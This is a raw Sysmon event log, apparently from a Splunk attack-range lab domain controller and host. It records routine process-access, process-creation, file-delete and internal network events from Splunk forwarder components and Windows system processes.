10:37:19.481{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.481{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0E5F-6216-A804-000000003802}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.481{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E5F-6216-A804-000000003802}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.482{C8EA50B7-0E5F-6216-A804-000000003802}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.841{C8EA50B7-0E60-6216-AA04-000000003802}41846032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.653{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E60-6216-AA04-000000003802}4184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.653{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.653{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.653{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0E60-6216-AA04-000000003802}4184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.653{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.653{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.653{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E60-6216-AA04-000000003802}4184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.654{C8EA50B7-0E60-6216-AA04-000000003802}4184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.514{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCF377970E17B3AA3CCC1F6DB2221FDC,SHA256=1F353371861A5FD98DF14E65B1A7289A3A30549E161E2DB2AD00C7C99DEC07A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.497{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EA2D482FFC2F551619D981479DFFCDD,SHA256=DB723BF4ACA4A5E01E40CE1FFD7FCC4E9556C1196E9B52B5814730D6D599C363,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.497{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=905113A7AC58F5854E0F1467A7B8127F,SHA256=0E1234DBF084426BDAE237934FE5D74B4EE191CE1286FEBD67B41C7731D561A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:20.169{C8EA50B7-0E5F-6216-A904-000000003802}48244784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.653{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EA2D482FFC2F551619D981479DFFCDD,SHA256=DB723BF4ACA4A5E01E40CE1FFD7FCC4E9556C1196E9B52B5814730D6D599C363,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.544{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28998229DCFCB7DD04D4AC2BD899037D,SHA256=A86400E1E431FBCC20B0EF7C1614BAAA9BEC2A2F65399CC7B5A5D5EB5D66286F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:21.013{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97BAF6A8A686406C4654F10123CB596,SHA256=00CA1E979033A10EFB988214125AF22D35CADDD1D156E6E54F26B514463CA6DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.325{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E61-6216-AB04-000000003802}2288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.325{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.325{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.325{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.325{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.325{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0E61-6216-AB04-000000003802}2288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.325{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E61-6216-AB04-000000003802}2288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:21.326{C8EA50B7-0E61-6216-AB04-000000003802}2288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:22.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09D368C51E8C643861B689E91EA36035,SHA256=4EDFDA833D2F9CAD0503451C3F8C1761DDEA6962F0DDDBE3B6CF5A97676DA0A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:22.044{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D6A901D784374ACF7CDD4DE18DD2181,SHA256=28EFDA7603E6664A5167FAAB5AAE7C57BAC96C3D9A70B9C66579187E81DAB8D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:19.671{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51181-false10.0.1.12-8000- 23542300x8000000000000000285222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:23.622{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2519A01B6203E5567AD46167B2A58DE,SHA256=04994865A038B4DDA61D3EB5B5FAD33C1420926F03CDAA03410D74BBFCC046F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:23.169{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F16B36ABD20EBF55B9A14FAA7995CBC,SHA256=D3BDAB89BB83773623042FB9B0331EB32F9139D08ACF91AE1FF44B69AFF09DED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 